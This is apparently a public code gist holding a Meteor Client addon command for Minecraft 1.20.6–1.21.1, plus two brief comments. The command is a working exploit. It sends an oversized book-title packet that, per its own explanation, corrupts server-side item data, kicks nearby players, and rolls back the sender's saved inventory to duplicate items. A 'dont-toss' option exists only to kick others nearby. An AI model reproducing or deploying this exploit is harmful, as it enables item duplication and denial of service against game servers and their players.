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Created August 24, 2024 06:20
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Minecraft 1.20.6->1.21.1 Writable Book Dupe
package com.example.addon.commands;
import com.mojang.brigadier.builder.LiteralArgumentBuilder;
import com.mojang.brigadier.exceptions.SimpleCommandExceptionType;
import meteordevelopment.meteorclient.commands.Command;
import net.minecraft.command.CommandSource;
import net.minecraft.item.Items;
import net.minecraft.screen.slot.SlotActionType;
import net.minecraft.text.Text;
import java.util.ArrayList;
import java.util.Optional;
public class WritableDupeCommand extends Command {
private static final SimpleCommandExceptionType NOT_HOLDING_BOOK = new SimpleCommandExceptionType(Text.literal("You must be holding a writable book to use this."));
public WritableDupeCommand() {
super("wbook-dupe", "contact 'thorioum' on discord for inquires");
The BookUpdateC2SPacket accepts up to 128 characters inside the title in the packet, however,
the WrittenBookContentComponent that is created when the server uses this packet only accepts 32 characters.
If you send an update packet with over 32 characters it leads to the server creating a book with invalid component data,
then also sending that invalid update to you and everyone around you kicking each other,
after you get kicked the server fails to save your player data with the invalid components, and it reverts your data
back to whatever the data was when you had just joined the server last,
you can then essentially join, drop items, use this command, and have the items back in your inventory and also on the ground
@author Thorioum
public void build(LiteralArgumentBuilder<CommandSource> builder) {
builder.executes(context -> {
if (mc.player.getMainHandStack().getItem() != Items.WRITABLE_BOOK)
throw NOT_HOLDING_BOOK.create();
ArrayList<String> pages = new ArrayList<>();
for (int i = 9; i <= 44; i++) {
if (mc.player.getInventory().selectedSlot == i-36) continue;
mc.interactionManager.clickSlot(mc.player.currentScreenHandler.syncId, i, 10, SlotActionType.THROW, mc.player);
mc.player.networkHandler.sendPacket(new BookUpdateC2SPacket(mc.player.getInventory().selectedSlot, pages, Optional.of("popbobfunnysexdupe2024hahafunnyrealrealreal")));
//use if you don't want to empty your inventory and just want to kick people in radius
builder.then(literal("dont-toss").executes(context -> {
if (mc.player.getMainHandStack().getItem() != Items.WRITABLE_BOOK)
throw NOT_HOLDING_BOOK.create();
ArrayList<String> pages = new ArrayList<>();
mc.player.networkHandler.sendPacket(new BookUpdateC2SPacket(mc.player.getInventory().selectedSlot, pages, Optional.of("popbobfunnysexdupe2024hahafunnyrealrealreal")));
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why pop bob

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because popbob sexdupe v2!!!

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